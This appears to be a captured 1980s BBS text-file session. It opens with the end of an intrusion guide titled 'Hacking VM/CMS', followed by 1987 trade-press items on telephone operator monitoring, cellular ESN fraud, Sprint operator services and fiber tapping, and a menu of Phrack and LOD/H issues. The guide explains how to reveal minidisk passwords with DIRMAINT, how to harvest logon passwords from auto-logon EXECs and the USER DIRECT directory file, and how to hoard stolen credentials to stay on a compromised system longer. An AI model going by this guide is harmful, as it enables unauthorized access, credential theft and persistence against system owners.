3380 SYSRES R/O 2 CYL DASD 193 3380 SYSRES R/O 19 CYL DASD 194 3380 SYSRES R/O 21 CYL DASD 19E 3380 SYSRES R/O 27 CYL In our Q SEARCH list, we have access to 190 as the system disk, 191 as our A disk, 192 as our D disk, 19E as the systems' Y disk. Both 193 and 194 are accessable but have not been accessed by us. Thus: .ACC 193 B B (193) R/O . Now the 193 disk is our B disk and accessable by us. You can perform the same procedure for the 194 disk. DIRMAINT: --------- The Directory Maintenance utility can be found on some systems. If it is running, DIRMAINT should be a valid userid. The DIRMAINT userid is automatically initialized when the system is started up. It remains in Disconnected mode awaiting transactions which contain directory maintenance commands. If you come across a system with DIRMAINT, it will provide you with all the information you need to know about it. A few commands are important, at least to the hacker: MDPW This displays access passwords for one or all of that userid's minidisks. .DIRM MDPW DVHDIR005R ENTER CURRENT CP PASSWORD TO VALIDATE COMMAND OR A NULL TO EXIT: R; T=0.12/0.15 19:33:34 DVHMDF301I MINIDISK 191: RBUBBA WBUBBA MBUBBA DVHMDF301I MINIDISK 192: RBUBPW BONEHEAD MULTIBUB The reason you must enter the users logon password is obvious. If someone walks up to a users terminal and wants to know what the guys disk passwords are all he would have to do is enter this command and would get them, except for the fact that it does ask for the users logon password, thus, protecting the disk passwords. Help Get more info on DIRM commands. PW This changes a users logon password PW? Find out how long it was since the user changed his logon password. MDISK Change access mode, change, add, or delete passwords. LINK Cause an automatic link, at logon, to another users minidisk. FOR Enter a DIRMaint command for another user if authorized. THINGS YOU WANT: ---------------- Things you want are: More valid userid's to try passwords on, actual logon passwords, and disk access passwords. Obtaining userid's can be accomplished by using the Q NAMES command every time you logon. Obtaining logon passwords isn't as simple. There are a couple of places which you will want to explore. The AUTOLOG1 or AUTOOP virtual machines (userid's) usually auto-logon other userid's. Now, in order to do this they must have those users' passwords. These are contained within various EXECs within their user directory. If you can obtain a valid disk access password for whichever one of these is running on your particular system, you can get more passwords and possibly some disk access passwords for about 10 other userid's. This should allow you to get more disk access passwords and hopefully more logon passwords. Nevertheless, having obtained a few more passwords, and not using them until the original one you hacked dies, will greatly extend your stay on the system. EXEC files from any user may contain more disk access passwords for other users and those users directories may contain EXECs which have more passwords, and so on. Of course many other types of files may contain this type of information. The CP directory, this is similar to a big bullseye on a target. This directory, as previously explained contains users' passwords, various system information and minidisk passwords. The directory usually goes under the filename/filetype of USER DIRECT. It can be anywhere on the system, and can have a different name which in my view would add to system security. It is usually found in either or both of two users' directorys which I leave to you to find (sorry). This is a very big weakness in CMS due to the fact that if you can find what userid the directory is in, and it's disk access password, you've got the system by the balls. The file may also have a filetype of INDEX which is a compilation or sorting of pertinent information used for speeding up various procedures the system carries out constantly. A typical entry in the USER DIRECT file would look like: USER BUBBA BUBAPASS 1M 3M BG VMU01000 ACCOUNT 101 SYSPROG VMU01010 IPL CMS VMU01020 CONSOLE 00D 3215 VMU01030 SPOOL 00C 2540 READER * VMU01040 SPOOL 00D 2540 PUNCH * VMU01050 SPOOL 00E 1403 A VMU01060 LINK MAINT 190 190 RR VMU01070 LINK MAINT 19D 19D RR VMU01080 LINK MAINT 19E 19E RR VMU01090 MDISK 191 3350 152 003 VMPK01 MR RBUBBA WBUBBA MBUBBA MDISK 192 3350 152 003 VMPK01 MR RBUBPW BONEHEAD MULTIBUB VMU01100 * The first line gives the userid of BUBBA, password BUBAPASS, 1 and 3 Megs of virtual memory, and Privilege Classes B and G. The next line gives the account number and department or owner of the account. The next few lines define miscellaneous system information. Next, three lines of what disks should be automatically linked to upon logon. And finally the minidisk (MDISK) virtual addresses and corresponding passwords. CONCLUSION: ----------- As usual, there is always more I could add to an article like this one. I did not want to keep writing part after part so I wrote a 'complete' article on Hacking VM/CMS. I apologize for its length of over 50K but I wanted to mention everything you needed to become familiar with the Operating System and its Security/Insecurity. I intentionally 'forgot' to mention various information which would put sensitive and destructive information in the hands of anyone who reads this article. The information within this article can and will be different from system to system so don't take anything too literally. This article is comprised: 80% information from actual system use, 10% CMS help files, and 10% from various CMS documentation. I may write a followup article of shorter length as more people become familiar with CMS. Lex Luthor Gfiles: (1-8, ^7),?,Q : Network News & Notes ------------------------------------------------------------------------------- CWA Backs Bill To Ban Secret Telephone Monitoring (Communications Week 4/13/87) The Communications Workers of America threw itself into the thick of a growing congressional debate on privacy protections for workers by launching a campaign to enact legislation prohibiting secret monitoring of telephone operators. The union has for years attempted unsuccessfully to stop telephone companies from listening to operators for performance assessments. The union estimated that over 200,000 operators at AT&T & local operating companies are under surveillance. Third-party monitoring of telephone calls is illegal under the 1968 Wiretap Act, but a provision in the law lets employers listen in on worker conversations. For many years, only the telephone companies had the ability to monitor employees. Today, with the development of electronic telephone gear and computers, the practice has spread to health and insurance company personnel, the IRS and airline and hotel reservation representatives. Telephone company officials said they had not yet determined their position on the bill, but they stressed that monitoring was necessary to ensure that operators maintain performance standards. "In the competitive world AT&T faces, the name of the game is how well you treat the customer," said an AT&T spokeswoman. "We make spot checks to ensure the quality of service. CWA president Morton Bahr argued at a news conference that monitoring does not improve service. "The assumption by many employers that supervision must be conducted secretly, or else the worker will quit trying, is both unfair and contradicts all available evidence," he said. The stress of being under surveillance by supervisors and computers often causes operators to develop stress-related illnesses, such as nervous conditions, anxiety, depression and ulcers, union officials said. Even the time operators take to use the bathroom is calculated. ------------------------------------------------------------------------------- Crime Doesn't Pay (Communications Week 4/13/87) Those 18 cellular telephone abusers recently arrested in New York on charges of illegally altering memory chips so they could make calls free of charge would not have been able to bilk carriers had the companies been using cellular phones from AUDIOVOX CORP., Hauppauge, N.Y. Audiovox president John Shalam said his company's phones contain a mechanism built into the software that blocks alteration of the phone's electronic serial number, or ESN. "If someone attempts to change the ESN, the phone will not activate," Shalam said. The cellular suspects apparently changed their ESNs, causing other users to be billed for the offender's calls. FBI agents estimated that local mobile telephone companies are losing approximately $40,000 per month, or about $3 million nationally, because of cellular fraud. ------------------------------------------------------------------------------- US Sprint Initiates Operator Services (Communications Week 4/13/87) US Sprint Communications Co. has quietly become the first major long distance company other than AT&T to offer its own nationwide collect calling, third-party billing and other operator services. US Sprint's initiation of operator services early this year was made possible by a multiyear agreement with National Data Corp. The Sprint program puts a small dent in AT&T's marketing claims that they provide value-added services its competitors cannot equal. Before Sprint began offering the nationwide program, only AT&T offered large-scale operator services to its customers. MCI Communications Corp. has been conducting a limited operator services trial exclusively in Topeka Kansas, for about two years but has no immediate plans to expand the service to other cities. National Data is primarily a transaction processing company, specializing in credit card authorizations via voice or data lines. Operators handling Sprint's collect and third-party traffic will also be spending some of their time handling credit card authorizations. Calls from a US Sprint customer to an operator are automatically turned over to National Data's operator centers in Atlanta; Cherry Hill, NJ.; Lombard Ill.; Miami; Sparks, Nevada; and Toronto, following directions from software developed for the long distance company's switches by National Data and Rockwell International Corp. National Data is currently negotiating with about 20 other regional and national long distance companies to provide the same sorts of services to them as the company does for US Sprint. ------------------------------------------------------------------------------- WARNING: Fiber Cable Is Not Tap Proof (Communications Week (4/13/87) Until recently, companies and government agencies were little concerned about clandestine siphoning of data from fiber optic networks. Because of the technology involved-lightwaves-fiber is considerable more difficult to eavesdrop on than copper wire. Many telecommunications users, however, have mistakenly assumed this to mean that fiber is tap-proof. Recent tests conducted by federal agencies, such as the NSA, CIA, and FBI have debunked the tap proof myth. Security of voice and data transmitted via fiber is an increasingly crucial issue as use of fiber optical local area networks grows within the government. Civilian agencies have committed themselves to upgrading their on-premises networks by installing fiber. The military too, is developing more applications for fiber optics. Encryption, while a common method of protecting military and State Dept. secrets, is expensive. While signal encryption is used mostly for classified defense communications, many other types of government data are not encoded. Security is a matter of definition. Fiber is secure in that it is resistant to simple methods of tapping. To tap it, you have to be much more sophisticated. Virtually anyone who can lift a manhole cover has access to leased lines. Indeed, the government says fiber's security advantages include its immunity to jamming, electromagnetic interference and electromagnetic pulses. Counter-intrusion equipment is designed to monitor and detect any breach in optical transmission, using the principle that at least some loss in a lightwave signal will occur if a fiber line is tapped. Such equipment also enables a rapid pinpointing of where the intrusion is being made on the cable. Gfiles: (1-8, ^8),?,Q : [ Main Section ] 1: [ Phrack #1 ] 2: [ Phrack #2 ] 3: [ Phrack #3 ] 4: [ Phrack #4 ] 5: [ Phrack #5 ] 6: [ Phrack #6 ] 7: [ Phrack #7 ] 8: [ Phrack #8 ] 9: [ Phrack #9 ] 10: [ Phrack #10 ] 11: [ Phrack #11 ] 12: [ Phrack #12 ] 13: [ Issue #13 is lame, lame, lame... ] 14: [ Phrack #14 ] 15: [ Phrack #15 ] 16: [ Phrack #16 ] 17: [ Phrack #17 ] 18: [ Phrack #18 ] 19: [ Phrack #19 ] 20: [ Phrack #20 ] 21: [ Phrack #21 ] 22: [ LOD/H Technical Journal #1 ] 23: [ LOD/H Technical Journal #2 ] 24: [ LOD/H Technical Journal #3 ] 25: [ Telecom Security Bulletin #1 ] 26: [ P/HUN Issue #1 ] 27: [ P/HUN Issue #2 ] 28: [ WGN Transcript ] 29: [ Activist Times Incorp. ] Gfiles: (1-29, ^23),?,Q :